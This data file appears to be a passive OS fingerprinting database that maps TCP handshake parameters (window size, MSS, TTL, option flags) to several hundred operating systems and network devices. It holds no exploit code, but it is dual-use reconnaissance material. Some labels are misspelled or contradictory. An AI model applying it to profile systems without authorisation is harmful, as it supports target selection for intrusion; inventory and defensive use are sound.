4000:05B4:40:00:0:1:0:0:S:3C:NetBSD 1.3/i386 4000:05B4:40:00:0:1:0:1:A:3C:NetBSD 1.5.2 (GENERIC) 4000:05B4:40:00:0:1:0:1:S:3C:NetBSD 1.5 (x86) 4000:05B4:40:00:0:1:1:0:S:2C:FreeBSD 2.2.8-RELEASE 4000:05B4:40:00:0:1:1:0:S:3C:Linux 2.4.2 - 2.4.14 4000:05B4:40:00:0:1:1:0:S:44:FreeBSD 4.3 - 4.4PRERELEASE 4000:05B4:40:00:0:1:1:0:S:LT:FreeBSD 2.2.8-RELEASE 4000:05B4:40:00:0:1:1:1:A:3C:NetBSD 1.6U 4000:05B4:40:00:0:1:1:1:S:3C:FreeBSD 4.4 4000:05B4:40:00:1:1:0:1:S:40:OpenBSD 3.2 4000:05B4:40:00:1:1:1:1:A:40:OpenBSD 3.5 4000:05B4:40:00:1:1:1:1:S:40:OpenBSD 3.0 4000:05B4:40:00:1:1:1:1:S:48:Amiga OS / Miami Deluxe 1.0c 4000:05B4:40:5E:0:1:1:0:S:2C:FreeBSD 4.0-STABLE, 3.2-RELEASE 4000:05B4:40:62:0:0:1:0:S:2C:FreeBSD 4.0-STABLE, 3.2-RELEASE 4000:05B4:40:70:0:0:1:0:S:2C:FreeBSD 4.0-STABLE, 3.2-RELEASE 4000:05B4:40:WS:0:0:0:0:A:2C:NetBSD 1.3 - 1.33 / AIX 4.3.X 4000:05B4:40:WS:0:0:0:0:S:2C:AIX 4.3 - 4.3.3 4000:05B4:40:WS:0:0:1:0:A:2C:NetBSD 4000:05B4:40:WS:0:0:1:0:S:2C:FreeBSD 4.2 - 4.3 4000:05B4:40:WS:1:1:0:0:A:30:Windows 4000:05B4:40:WS:1:1:1:0:S:30:Windows 2000 sp3 4000:05B4:80:00:0:1:1:1:A:LT:Linux Kernel 2.4.xx (X86) 4000:05B4:80:00:1:1:0:1:A:40:Windows Server 2003 4000:05B4:80:00:1:1:1:0:S:30:Windows 2000 4000:05B4:80:00:1:1:1:1:A:40:Windows 2000 4000:05B4:80:00:1:1:1:1:S:40:Windows 2000 Pro 4000:05B4:80:4B:1:1:1:0:S:30:Windows ME 4000:05B4:80:WS:0:0:0:0:A:2C:Windows 2000 4000:05B4:80:WS:0:0:0:0:S:2C:Windows Longhorn 4000:05B4:80:WS:0:0:1:0:A:2C:Windows 2000 4000:05B4:80:WS:0:1:1:0:S:30:Windows XP 4000:05B4:80:WS:1:1:0:0:A:30:Windows Server 2003 4000:05B4:80:WS:1:1:0:0:S:30:Windows 2000 4000:05B4:80:WS:1:1:0:0:S:LT:BeOS 4000:05B4:80:WS:1:1:1:0:A:30:Windows XP 4000:05B4:80:WS:1:1:1:0:S:30:Windows ME / 2000 / XP 4000:05B4:80:WS:1:1:1:0:S:3C:Linux RedHat 7.2 (kernel 2.4.9) 4000:05B4:80:WS:1:1:1:0:S:LT:Windows XP / 2000 / ME 4000:05B4:FF:00:0:1:1:0:S:LT:FreeBSD 2.2.6-RELEASE 4000:05B4:FF:WS:0:0:0:0:A:LT:Cisco Systems IOS 11.3 4000:05B4:FF:WS:1:1:1:0:S:30:Windows 2000 4000:0650:40:00:0:1:1:1:A:3C:NetBSD 1.6 4000:0FB0:80:WS:1:1:1:0:S:LT:Windows 2000 Professional 4000:3605:80:WS:1:1:1:0:S:30:Windows XP 4000:5005:40:WS:0:0:0:0:A:2C:Mac OS X 4000:5005:80:WS:0:0:0:0:A:2C:Windows 2000 4000:62BB:80:WS:1:1:1:0:S:LT:Windows 2000 4000:B405:40:00:0:1:0:1:A:3C:NetBSD 1.5 4000:B405:40:00:0:1:1:1:S:LT:FreeBSD 4000:B405:80:00:0:1:0:1:A:3C:Windows Server 2003 4000:B405:80:WS:1:1:1:0:S:30:Windows XP / 2000 / ME 4000:B405:80:WS:1:1:1:0:S:LT:Windows XP - 2000 4000:D84A:80:WS:1:1:1:0:S:30:Windows 2000 4000:_MSS:80:00:0:0:0:0:A:LT:IBM MVS (unknown version) 4000:_MSS:80:00:0:0:1:0:A:LT:OpenVMS 7.1 using Process Software's TCPWare 5.3 4000:_MSS:80:00:0:1:0:0:A:LT:Check Point FireWall-1 4.0 SP-5 (IPSO build) 4000:_MSS:80:00:0:1:0:1:A:LT:Check Point FireWall-1 4.0 SP-5 (IPSO build) 4000:_MSS:80:WS:0:0:0:0:A:LT:Auspex Fileserver (AuspexOS 1.9.1/SunOS 4.1.4) 4000:_MSS:80:WS:0:0:0:0:S:28:Windows XP 4000:_MSS:80:WS:0:0:1:0:A:LT:AmigaOS Miami 3.0 4020:0564:40:00:0:1:0:1:A:3C:OpenBSD 402E:0218:80:00:0:1:1:1:A:3C:Windows Millenium 402E:05B4:80:00:0:1:0:1:A:3C:Linux 402E:05B4:80:00:0:1:1:1:A:3C:Windows 2000 Professional / Windows XP 402E:5005:80:00:0:1:1:1:A:3C:Windows XP / 2000 / ME 402E:B405:40:WS:0:0:1:0:A:LT:Free BSD 4.1.1 - 4.3 X86 402E:_MSS:80:00:0:1:0:0:A:LT:FreeBSD 2.1.0 - 2.1.5 402E:_MSS:80:00:0:1:0:1:A:LT:FreeBSD 2.1.0 - 2.1.5 402E:_MSS:80:00:0:1:1:0:A:LT:D-Link DI-701, Version 2.22 402E:_MSS:80:00:0:1:1:1:A:LT:D-Link DI-701, Version 2.22 402E:_MSS:80:WS:0:0:0:0:A:LT:OpenBSD 2.1/X86 402E:_MSS:80:WS:0:0:1:0:A:LT:AmigaOS Miami 2.1-3.0 402E:_MSS:80:WS:0:1:1:0:A:LT:Windows XP Professional Release 403D:_MSS:80:00:0:1:0:0:A:LT:FreeBSD 2.1.0 - 2.1.5 403D:_MSS:80:00:0:1:0:1:A:LT:FreeBSD 2.1.0 - 2.1.5 403D:_MSS:80:00:0:1:1:0:A:LT:Acorn RiscOS 3.7 using AcornNet TCP/IP stack 403D:_MSS:80:00:0:1:1:1:A:LT:Acorn RiscOS 3.7 using AcornNet TCP/IP stack 4074:01F4:40:00:0:1:0:1:A:3C:OpenBSD 3.2 4074:_MSS:40:WS:0:0:0:0:A:LT:OpenBSD 2.x 4088:05B4:40:WS:0:0:1:0:A:LT:FreeBSD 40B0:0564:80:WS:1:1:1:0:A:30:Windows 2000 (firewalled) 40B0:05B4:40:WS:0:0:1:0:A:2C:FreeBSD 4.3 40E8:0218:80:WS:1:1:1:0:A:LT:Windows ME 40E8:04EC:80:WS:0:0:1:0:A:2C:Windows 2000 Pro 40E8:0584:80:WS:0:0:1:0:A:2C:Windows 2000 40E8:05B4:40:00:1:1:0:1:A:40:Windows 40E8:05B4:80:WS:0:0:1:0:A:2C:Windows 2000 Server 40E8:05B4:80:WS:1:1:1:0:A:30:Windows XP 40E8:05B4:FF:00:0:0:1:0:S:30:Mac OS 7.x-9.x 40E8:B405:80:WS:0:0:1:0:A:2C:Windows 2000 40E8:B405:FF:00:0:0:1:0:S:LT:Mac OS 8.6 4150:_MSS:40:WS:0:0:1:0:A:LT:Cisco Localdirector 430, running OS 2.1 41A0:0578:80:00:1:1:1:1:A:40:Windows XP SP1 41A0:0584:40:00:1:1:1:1:A:40:Windos XP 41B8:05B4:80:WS:1:1:1:0:A:30:Windows 2000 server 41E8:057E:80:00:1:1:1:1:A:40:Windows 2000 4230:0584:80:00:1:1:0:1:A:40:Linux 4230:0584:80:00:1:1:1:1:A:40:Windows 2000 Server 4230:0584:80:WS:1:1:0:0:A:30:Windows 2000 Server 4230:0584:80:WS:1:1:1:0:A:30:Windows 2000 Server 4230:05B4:80:WS:1:1:1:0:A:30:Windows XP 4238:0518:40:WS:0:0:0:0:S:2C:Xbox 4240:05B4:40:04:1:1:1:0:S:34:Windows XP 4240:05B4:80:04:1:1:1:0:S:34:Windows 2000 Pro 4240:B405:80:04:1:1:1:0:S:34:Windows XP 4240:_MSS:80:00:0:0:1:0:A:LT:MacOS 8.1 4248:0586:80:00:1:1:1:1:A:40:GNU / Olli OS 4248:0586:80:WS:1:1:1:0:A:30:Windows 2000 server 4290:058C:40:WS:0:0:1:0:A:2C:Windows 2000 4290:05B4:80:WS:1:1:1:0:A:30:Windows 2000 Pro SP3 4322:052A:40:WS:0:0:1:0:A:2C:Windows 4322:05B4:80:WS:1:1:1:0:A:30:Linksys Router 4350:9C05:80:WS:1:1:1:0:A:30:Windows Server 2003 4380:05A0:80:WS:1:1:1:0:A:30:Openbsd 4380:05B4:80:WS:1:1:1:0:A:30:Windows 2003 Server 4380:A005:80:WS:1:1:1:0:A:30:Open BSD 43B0:05A4:80:WS:1:1:1:0:A:30:OpenBSD 2.8 GENERIC 43E0:05B4:40:00:0:1:0:1:A:LT:OpenBSD 2.8 GENERIC 43E0:05B4:40:00:0:1:1:0:A:LT:FreeBSD 4.x 43E0:05B4:40:00:0:1:1:1:A:3C:FreeBSD 4.4-Release 43E0:05B4:40:00:1:1:0:1:A:40:OpenBSD 3.4 43E0:05B4:40:00:1:1:1:1:A:40:OpenBSD 2.9 3.0 43E0:A805:40:00:0:1:0:1:A:LT:OpenBSD 2.6 43E0:B405:40:00:0:1:0:1:A:LT:OpenBSD 2.9 43E0:B405:40:00:0:1:1:1:A:3C:FreeBSD 4.4 / OpenBSD 3.1 43E0:_MSS:40:WS:0:0:0:0:A:LT:OpenBSD 2.x 43E0:_MSS:40:WS:0:0:1:0:A:LT:FreeBSD 2.2.1 - 4.0 43F8:AA05:40:WS:0:0:1:0:A:2C:Free BSD 4410:05AC:40:WS:0:0:1:0:A:2C:OpenBSD 3.0 4410:05AC:40:WS:1:1:1:0:A:30:OpenBSD 3.0 4410:05AC:80:00:1:1:1:1:A:40:Windows 2003 4410:05AC:80:WS:1:1:1:0:A:30:Windows 2000 Workstation / Windows 98 SE 4410:05B4:80:00:1:1:1:0:A:34:Windows 2000 4410:05B4:80:00:1:1:1:1:A:40:Windows 2000 4410:05B4:80:WS:1:1:1:0:A:30:Windows 2000 4431:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 2.7 4431:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 2.7 4440:05B0:80:00:1:1:1:1:A:40:Windows 2000 (Advanced Server) 4440:05B0:80:WS:1:1:1:0:A:30:Solaris 7 4440:05B4:80:WS:1:1:1:0:A:30:Windows 2000 Terminal Server 4440:05B4:80:WS:1:1:1:0:A:LT:Solaris 7 4452:_MSS:80:00:0:0:1:0:A:LT:Solaris 2.5, 2.5.1 4470:05B4:40:00:0:1:0:1:A:3C:Windows 2000 4470:05B4:40:00:0:1:1:1:A:3C:WINDOWS 2000 4470:05B4:40:00:1:1:0:0:A:LT:Windows 2000 4470:05B4:40:00:1:1:0:1:A:40:Windows NT 4470:05B4:40:00:1:1:1:0:A:34:OpenBSD 3.0 4470:05B4:40:00:1:1:1:1:A:3C:Linux 4470:05B4:40:00:1:1:1:1:A:40:Windows NT 4470:05B4:40:WS:0:0:0:0:A:LT:FreeBSD NFR Network Flight Recorder 4470:05B4:40:WS:0:0:1:0:A:2C:FreeBSD 4.2 / FreeBSD 3.4-STABLE 4470:05B4:40:WS:1:1:0:0:A:30:OpenBSD 2.8 4470:05B4:40:WS:1:1:1:0:A:30:OpenBSD 3.0 - 3.1 4470:05B4:80:00:0:1:1:0:A:LT:Windows 2000 4470:05B4:80:00:0:1:1:1:A:3C:Windows NT4 / Win95 / Win98 4470:05B4:80:00:1:1:0:1:A:40:Linux 2.2.14 - 2.2.20 4470:05B4:80:00:1:1:0:1:A:LT:Windows 2000 Professional 4470:05B4:80:00:1:1:1:0:A:34:Windows 2000 Server 4470:05B4:80:00:1:1:1:1:A:40:Windows 2000 Pro / XP Pro / 2003 Server 4470:05B4:80:00:1:1:1:1:S:40:HP Printer 4470:05B4:80:WS:0:0:1:0:A:2C:Windows 2000 4470:05B4:80:WS:1:1:0:0:A:30:Windows 2000 pro 4470:05B4:80:WS:1:1:1:0:A:30:Windows 2000 Server / XP Pro / NT 4.0 server 4470:05B4:80:WS:1:1:1:0:A:3C:FreeBSD 4.x 4470:05B4:80:WS:1:1:1:0:S:30:Windows Server 2003 Enterprise Edition 4470:05B4:80:WS:1:1:1:1:S:3C:Windows 2000 Advance Server 4470:05B4:FF:WS:0:0:1:0:A:2C:Windows 2000 4470:05B4:FF:WS:1:1:1:0:A:30:Windows XP 4470:B405:40:00:0:1:1:1:A:3C:Windows NT 2000/5.0 4470:B405:80:00:0:1:0:1:A:3C:Windows ME 4470:B405:80:00:0:1:1:1:A:3C:Windows 2000 Workstation / XP Home 4470:B405:80:00:0:1:1:1:A:LT:Windows Server 2003 4470:B405:80:00:1:1:1:0:A:34:Windows XP SP1 4470:B405:80:WS:1:1:0:0:A:30:Mac OS 8.6 4470:B405:80:WS:1:1:1:0:A:30:Windows XP 4470:B405:FF:00:0:0:1:0:A:LT:Mac OS 8.6 4470:_MSS:40:WS:0:0:0:0:A:LT:FreeBSD 2.2.1 - 4.0 4470:_MSS:40:WS:0:0:1:0:A:LT:FreeBSD 2.2.1 - 4.0 4470:_MSS:80:WS:0:0:0:0:A:LT:Snap Network Box 44E8:04EC:80:00:1:1:1:1:A:40:Windows 2000 pro 44E8:04EC:80:WS:1:1:1:0:A:30:Windows 2000 Pro 4510:0550:80:00:1:1:1:1:A:40:Windows 2000 4510:0550:80:WS:0:0:1:0:A:LT:Windows 2000 Professional 5.0.2195 Service Pack 2 4510:0550:80:WS:1:1:1:0:A:30:Windows 2000 Professional 5.0.2195 Service Pack 2 4510:05B4:FF:WS:1:1:1:0:A:30:Windows XP Pro 455B:_MSS:80:00:0:0:0:0:A:LT:MacOS 8.1 running on a PowerPC G3 (iMac) 455B:_MSS:80:00:0:0:1:0:A:LT:Mac OS 8.6 462B:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 7 X86 462B:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 7 X86 4764:23B2:40:00:1:1:1:1:S:3C:Linux 2.4.xx 4860:0218:80:WS:1:1:1:0:S:30:Windows XP 4860:058E:10:WS:1:1:1:0:S:30:Linux 4860:05B4:80:WS:1:1:1:0:S:30:Windows 2000 4EC0:05B4:80:00:0:1:1:1:A:3C:Windows XP Pro SP1 4F68:05AC:80:WS:1:1:1:0:S:30:Windows 2000 Professional 4FD8:05B4:40:00:1:1:1:0:S:34:Windows XP Professional 5B40:_MSS:80:WS:0:0:0:0:A:LT:Polycom ViewStation 512K videoconferencing system 6000:_MSS:80:00:0:0:0:0:A:LT:SCO OpenServer(TM) Release 5 6000:_MSS:80:00:0:0:1:0:A:LT:OpenVMS v7.1 VAX 6000:_MSS:80:00:0:1:1:0:A:LT:Sequent DYNIX/ptx(R) V4.4.6 6028:05B4:40:00:0:1:1:1:A:3C:Solaris 8 6028:05B4:40:00:1:1:1:1:A:40:Solaris 7 / 8 6028:B405:40:00:0:1:1:1:A:3C:Solaris 8 6030:0564:40:00:1:1:1:1:A:40:Solaris 8 6030:6405:40:00:0:1:1:1:A:3C:Solaris 8 6044:05B4:40:00:1:1:1:1:A:40:unknown 6050:05B4:40:00:1:1:1:0:A:34:Windows 6050:05B4:40:WS:0:0:1:0:A:2C:Solaris 9 6050:05B4:FF:WS:0:0:0:0:A:2C:Solaris 8 606C:00D8:40:00:1:1:1:1:A:40:Solaris 9 60DA:0584:40:00:0:1:1:1:A:3C:Solaris 8 60DA:_MSS:80:00:0:1:1:0:A:LT:Sun Solaris 8 early acces beta through actual release 60DA:_MSS:80:00:0:1:1:1:A:LT:Sun Solaris 8 early acces beta through actual release 60F4:05B4:40:00:0:0:1:0:S:LT:SCO UnixWare 7.0.1 60F4:05B4:40:00:0:1:1:0:A:30:SunOS 5.8 60F4:05B4:40:00:0:1:1:0:S:LT:SCO UnixWare 7.1.0 x86 60F4:05B4:40:00:0:1:1:1:A:3C:SCO UnixWare 7.1.1 60F4:05B4:40:00:1:1:1:0:A:34:SunOS 5.8 60F4:05B4:40:WS:0:0:0:0:A:2C:SCO openserver 5.0.5 60F4:05B4:40:WS:0:0:0:0:S:2C:SCO openserver 5.0.6 60F4:05B4:40:WS:0:0:1:0:A:2C:Windows 2000 60F4:05B4:40:WS:0:0:1:0:S:2C:SCO Openserver 5 60F4:05B4:40:WS:1:1:0:0:S:30:SunOS 5.8 60F4:05B4:40:WS:1:1:1:0:A:30:SunOS 5.8 60F4:05B4:40:WS:1:1:1:0:S:30:Solaris 8 60F4:05B4:40:WS:1:1:1:0:S:LT:Solaris 8 60F4:B405:40:WS:1:1:1:0:S:LT:Sun 60F4:_MSS:40:WS:0:0:1:0:A:LT:SCO OpenServer 5.0.5 60F4:_MSS:80:00:0:1:0:0:A:LT:NCR MP-RAS SVR4 UNIX System Version 3 60F4:_MSS:80:00:0:1:0:1:A:LT:NCR MP-RAS SVR4 UNIX System Version 3 60F4:_MSS:80:00:0:1:1:0:A:LT:NCR MP-RAS 3.01 60F4:_MSS:80:00:0:1:1:1:A:LT:NCR MP-RAS 3.01 60F4:_MSS:80:WS:0:0:0:0:A:LT:SCO UnixWare 7.0.0 or OpenServer 5.0.4-5 6108:0564:40:WS:1:1:0:0:A:30:Windows 95 / 98 61A8:0200:40:00:1:1:1:1:A:LT:Windows NT 61A8:_MSS:80:00:0:1:1:0:A:LT:Windows NT4 / Win95 / Win98 61A8:_MSS:80:00:0:1:1:1:A:LT:Windows NT4 / Win95 / Win98 6270:04EC:80:00:1:1:1:0:S:34:Windows 2000 6270:04EC:80:WS:1:1:1:0:A:30:Linux Red Hat 6270:04EC:80:WS:1:1:1:0:S:30:Windows XP 6270:0564:40:WS:1:1:1:0:A:30:Windows 6270:0584:40:00:1:1:1:1:A:40:SunOS 5.8 6270:05AC:80:00:1:1:1:1:A:40:Solaris 6270:05B4:40:00:1:1:1:0:S:34:Windows 2000 6270:05B4:80:WS:1:1:1:0:S:30:Windows XP 6348:0584:40:WS:1:1:1:0:A:30:Solaris/Ultra sparc 6420:_MSS:40:WS:0:1:1:0:A:3C:SunOS 5.8 64F0:055C:40:WS:1:1:1:1:A:3C:SunOS 6540:05B4:40:00:1:1:1:1:A:40:Windows XP 6978:05B4:80:WS:1:1:1:0:S:30:Windows XP 6C68:05B4:40:02:1:1:1:0:S:34:Windows XP 6FCC:_MSS:80:WS:0:0:0:0:A:LT:IBM OS/2 V 2.1 7000:05B4:40:WS:0:0:0:0:A:2C:IBM OS/2 7000:05B4:40:WS:0:0:0:0:S:2C:IBM OS/2 V.3 7000:_MSS:80:WS:0:0:0:0:A:LT:IBM OS/2 V.3 70D5:_MSS:80:00:0:1:1:0:A:LT:Digital UNIX OSF1 V 4.0-4.0F 7210:04EC:40:00:1:1:1:1:S:40:Windows 98 7210:05B4:80:WS:0:0:1:0:A:2C:Windows NT server 4.0 sp6a 77C4:05B4:40:00:0:1:1:0:A:30:Linux 2.2.19 77C4:05B4:40:00:1:1:0:1:A:3C:Linux 2.2.22 (PLD) 77C4:05B4:40:00:1:1:1:1:A:3C:Linux SuSE 7.3 77C4:05B4:40:00:1:1:1:1:A:LT:Linux SuSE 7.x 77C4:05B4:40:WS:0:0:1:0:A:2C:SuSE Linux 7.1 77C4:05B4:40:WS:1:1:1:0:A:30:Linux Mandrake 7.1 / Debian 3.0 77C4:B405:40:00:0:1:1:1:A:3C:Linux 77C4:_MSS:40:WS:0:0:1:0:A:LT:Linux 2.1.122 - 2.2.14 7850:0578:40:WS:1:1:1:0:A:30:Suse Linux 7.0 7900:_MSS:80:00:0:1:1:0:A:LT:Atari Mega STE running JIS-68k 3.0 7900:_MSS:80:00:0:1:1:1:A:LT:Atari Mega STE running JIS-68k 3.0 7958:0584:40:00:1:1:1:0:A:34:Linux Mandrake 7.2 7958:0584:40:00:1:1:1:1:A:3C:Windows NT 4 7958:0584:40:WS:1:1:1:0:A:30:Linux 2.2.16-3 (RH 6.2) 7960:0F2C:40:00:1:1:1:0:S:LT:Linux 2.2.12-20 7B10:0598:40:00:1:1:1:1:A:3C:Linux 2.2.18pre21 7B2F:_MSS:80:00:0:1:1:0:A:LT:Linux 2.1.19 - 2.2.17 7B2F:_MSS:80:00:0:1:1:1:A:LT:Linux 2.1.19 - 2.2.17 7B44:055C:40:WS:1:1:1:0:A:30:Debian/GNU Linux 7B88:0218:40:WS:0:0:1:0:A:2C:Reliant Unix from Siemens-Nixdorf 7BC0:_MSS:40:WS:0:0:1:0:A:LT:Linux 2.1.122 - 2.2.14 7BF0:052A:40:WS:1:1:1:0:A:30:PLD Linux 7BF0:2A05:40:WS:1:1:1:0:A:30:Linux 2.2.19 7BF0:_MSS:40:WS:0:0:1:0:A:LT:Linux 2.1.122 - 2.2.14 7BFC:0564:40:00:1:1:1:1:A:3C:Slackware Linux 8.0 7BFC:0564:40:00:1:1:1:1:A:LT:CISCO PIX 6.1 7BFC:0564:40:WS:0:0:1:0:A:2C:Linux 7BFC:0564:40:WS:1:0:1:1:A:38:Linux 7BFC:0564:40:WS:1:1:1:0:A:LT:Cisco PIX 7BFC:6405:40:00:0:1:1:1:A:3C:Linux 7C00:_MSS:80:00:0:0:0:0:A:LT:Linux 2.0.27 - 2.0.30 7C00:_MSS:80:WS:0:0:0:0:A:LT:Convex OS Release 10.1 7C38:_MSS:80:00:0:1:1:0:A:LT:Linux 2.1.19 - 2.2.17 7C38:_MSS:80:00:0:1:1:1:A:LT:Linux 2.1.19 - 2.2.17 7C70:05B4:40:00:1:1:1:0:S:LT:Linux 2.3.99-ac - 2.4.0-test1 7C70:_MSS:80:00:0:1:1:0:A:LT:Linux 2.3.28-33 7C70:_MSS:80:00:0:1:1:1:A:LT:Linux 2.3.28-33 7C9C:05AA:40:WS:0:0:1:0:A:2C:SuSE Linux 7.0 7C9C:AA05:40:00:0:1:1:1:A:LT:Linux RedHat 7.1 7CC8:0584:40:00:1:1:1:0:S:3C:Linux 2.2 7D00:04EC:80:WS:1:1:1:0:S:30:Windows XP Home 7D00:05A0:80:00:1:1:1:0:S:34:Windows 7D00:05A0:80:WS:1:1:1:0:S:30:OpenBSD 7D00:05B4:80:WS:1:1:1:0:S:30:Windows XP Pro 7D78:0109:80:10:0:1:0:1:S:LT:OpenBSD 2.9 generic 7D78:0564:40:00:1:1:1:1:S:3C:Linux 7D78:0564:40:WS:1:1:1:1:S:3C:Slware Linux 7.1 7D78:05AC:40:00:1:1:1:0:A:34:OpenBSD 2.9 7D78:05B4:01:00:1:1:1:1:S:3C:Linux 7D78:05B4:20:00:1:1:1:0:S:LT:Linux 2.2.13 7D78:05B4:3A:WS:0:0:0:0:S:LT:Linux 2.0.38 7D78:05B4:40:00:0:1:1:0:A:30:RedHat 6.2 7D78:05B4:40:00:0:1:1:0:S:LT:Linux 2.2.19 7D78:05B4:40:00:0:1:1:1:A:3C:Linux 2.2.17 - 2.2.20 7D78:05B4:40:00:1:1:0:0:S:LT:Linux 2.2.19 7D78:05B4:40:00:1:1:0:1:A:3C:Linux pld 2.4.22 7D78:05B4:40:00:1:1:1:0:A:34:Linux 2.2.19 (Mandrake Secure) 7D78:05B4:40:00:1:1:1:0:A:LT:Linux 2.2.19 - 2.2.20 7D78:05B4:40:00:1:1:1:0:S:34:Linux 2.2.19 (Mandrake Secure) 7D78:05B4:40:00:1:1:1:0:S:3C:Linux 2.2.9 - 2.2.18 7D78:05B4:40:00:1:1:1:0:S:LT:Linux 2.2.14 - 2.2.20 7D78:05B4:40:00:1:1:1:1:A:3C:Linux 2.2.14 - 2.2.20 7D78:05B4:40:00:1:1:1:1:S:3C:Linux 2.2.14 - 2.2.20 7D78:05B4:40:09:1:1:1:0:S:3C:Linux 2.2.x 7D78:05B4:40:BE:1:1:1:0:S:3C:Linux 2.2.16 7D78:05B4:40:WS:0:0:0:0:S:2C:Linux 2.0.33 7D78:05B4:40:WS:0:0:1:0:A:2C:Cobalt Linux RaQ 4 (2.2.19) 7D78:05B4:40:WS:0:0:1:0:A:LT:Linux 2.2.19 - 2.2.20 7D78:05B4:40:WS:1:0:1:1:A:38:Linux 2.2.16-22 7D78:05B4:40:WS:1:1:0:0:A:30:Linux 2.2.(PLD) 7D78:05B4:40:WS:1:1:1:0:A:30:Linux 2.2.12 - 2.2.20 7D78:05B4:80:WS:0:0:1:0:A:LT:Windows XP 7D78:05B4:80:WS:1:1:1:0:A:30:Windows 2000 sp2 7D78:05B4:80:WS:1:1:1:0:S:30:Windows XP Professional 7D78:05B4:FF:00:1:1:1:1:A:3C:Linux 2.2.18 7D78:B405:40:00:0:1:1:0:A:30:Yellow Dog Linux 2.2 7D78:B405:40:00:0:1:1:1:A:3C:Cobalt 7D78:B405:40:00:1:1:1:1:A:3C:Linux Redhat 6.2 Zoot (Kernel 2.2.14-5) 7D78:B405:40:00:1:1:1:1:S:LT:Linux 2.2.14 7D78:_MSS:80:WS:0:0:0:0:A:28:Linux 7D78:_MSS:80:WS:0:0:0:0:S:28:Linux 2.4.19 crypto gentoo 7DC8:0578:40:WS:1:1:1:0:A:30:Suse Linux 7E18:_MSS:80:00:0:1:1:0:A:LT:Linux Kernel 2.4.0-test5 7EA0:3F5C:40:00:1:1:1:1:A:3C:Linux Kernel 2.4.10 7EB8:3F5C:40:00:1:1:1:1:S:3C:Suse 7.3 (2.4.16) 7EDC:0584:40:WS:1:1:1:0:A:LT:Linux 2.2.18 7EF4:0514:40:00:1:1:1:1:A:3C:Linux 2.2.14 7F53:0109:40:00:0:1:1:1:A:LT:Linux 2.2.14 7F53:_MSS:80:00:0:0:0:0:A:LT:AIX 4.0 - 4.2 7F53:_MSS:80:00:0:1:1:0:A:LT:Linux 2.1.19 - 2.2.17 7F53:_MSS:80:00:0:1:1:1:A:LT:Linux 2.1.19 - 2.2.17 7F53:_MSS:80:WS:0:0:0:0:A:LT:AIX 3.2 7F53:_MSS:80:WS:0:0:1:0:A:LT:Linux Kernel 2.1.88 7F7D:_MSS:80:00:0:1:1:0:A:LT:Linux 2.1.91 - 2.1.103 7F7D:_MSS:80:00:0:1:1:1:A:LT:Linux 2.1.91 - 2.1.103 7F80:0550:40:00:1:1:1:1:A:LT:Linux 2.2.19 7FB6:0218:FF:00:0:0:0:0:S:LT:3Com HiPer ARC, System V4.2.32 7FB8:0218:40:00:1:1:0:0:S:3C:SCO UnixWare 7.1.0 x86 7FB8:0218:40:00:1:1:0:1:S:3C:Linux 7FB8:0218:40:00:1:1:1:1:A:LT:Linux 2.2.19 7FB8:0218:40:WS:0:0:1:0:A:2C:Linux 2.2.16 7FE0:05B4:40:WS:0:0:0:0:A:2C:Linux 2.0.38 7FE0:_MSS:40:WS:0:0:0:0:A:LT:Linux 2.0.34 - 2.0.38 7FE0:_MSS:80:00:0:0:0:0:A:LT:Linux 2.0.32-34 7FE0:_MSS:80:WS:0:0:0:0:A:LT:Cobalt Linux 4.0 (Fargo) Kernel 2.0.34C52_SK on MIPS 7FF0:_MSS:80:00:0:0:0:0:A:LT:Linux 2.0.34-38 7FFF:04EC:80:WS:1:1:1:0:S:30:Windows 2000 7FFF:0550:80:00:1:1:1:0:S:34:Windows 2000 7FFF:0550:80:WS:1:1:1:0:A:30:Windows 2000 7FFF:0550:80:WS:1:1:1:0:S:30:Suse 7FFF:0564:80:WS:1:1:1:0:A:30:Windows 98 SE 7FFF:0578:80:WS:1:1:1:0:S:30:Linux Suse 7FFF:057A:80:00:1:1:1:0:S:34:Linux 7FFF:0586:40:WS:1:1:1:0:S:30:Windows 2000 7FFF:058E:40:00:1:1:1:0:S:34:OpenBSD 3.1 7FFF:05A0:80:00:1:1:1:0:S:34:Windows XP 7FFF:05A0:80:WS:1:1:1:0:A:30:Windows 98 SE 7FFF:05A0:80:WS:1:1:1:0:S:30:Windows 2000 Server 7FFF:05AC:80:00:0:1:1:0:A:30:Windows 2000 / XP / ME 7FFF:05AC:80:00:1:1:1:0:S:34:Windows 2000 7FFF:05AC:80:WS:1:1:1:0:S:30:Microsoft Windows XP Professional 7FFF:05B4:40:00:0:1:0:0:A:30:Sinix 5.4x 7FFF:05B4:40:00:0:1:1:0:A:30:Windows XP 7FFF:05B4:40:00:1:1:1:1:S:3C:SuSe Linux 7FFF:05B4:40:03:1:1:1:1:S:3C:Linux 7FFF:05B4:40:WS:0:0:0:0:S:2C:Windows 98 SE 7FFF:05B4:80:00:0:1:1:1:A:3C:Windows XP 7FFF:05B4:80:00:1:1:1:0:S:34:Windows XP / 2000 7FFF:05B4:80:00:1:1:1:1:A:40:Windows 2000 7FFF:05B4:80:00:1:1:1:1:S:40:Windows XP Service Pack 1 7FFF:05B4:80:WS:0:0:1:0:A:2C:Windows NT 7FFF:05B4:80:WS:0:0:1:0:S:2C:Windows NT 4.0 SP6a 7FFF:05B4:80:WS:1:1:1:0:A:30:Windows 98 SE 7FFF:05B4:80:WS:1:1:1:0:S:30:Windows 2000 Server 7FFF:7E05:80:00:0:1:1:0:A:30:BeOS 7FFF:_MSS:40:WS:0:0:0:0:S:28:Linux 2.6.10 7FFF:_MSS:80:00:0:0:1:0:A:LT:Linux 2.4.7 (X86) 7FFF:_MSS:80:00:0:1:0:0:A:LT:ReliantUNIX-Y 5.44 B0033 RM600 1/256 R10000 7FFF:_MSS:80:00:0:1:1:0:A:LT:Linux Kernel 2.4.xx (X86) 7FFF:_MSS:80:00:0:1:1:1:A:LT:Linux Kernel 2.4.xx (X86) 7FFF:_MSS:80:WS:0:0:0:0:A:LT:SINIX-Y 5.43B0045 7FFF:_MSS:80:WS:0:0:1:0:A:LT:Linux 2.1.76 8000:0200:40:00:0:1:0:0:A:LT:Mac OS X Server 8000:0218:40:WS:0:0:1:0:A:2C:HP-UX 8000:0564:40:00:0:1:0:1:A:3C:solaris 8 8000:0564:40:00:1:1:1:1:A:40:Solaris 8 8000:0578:40:00:0:1:1:1:S:3C:Linux 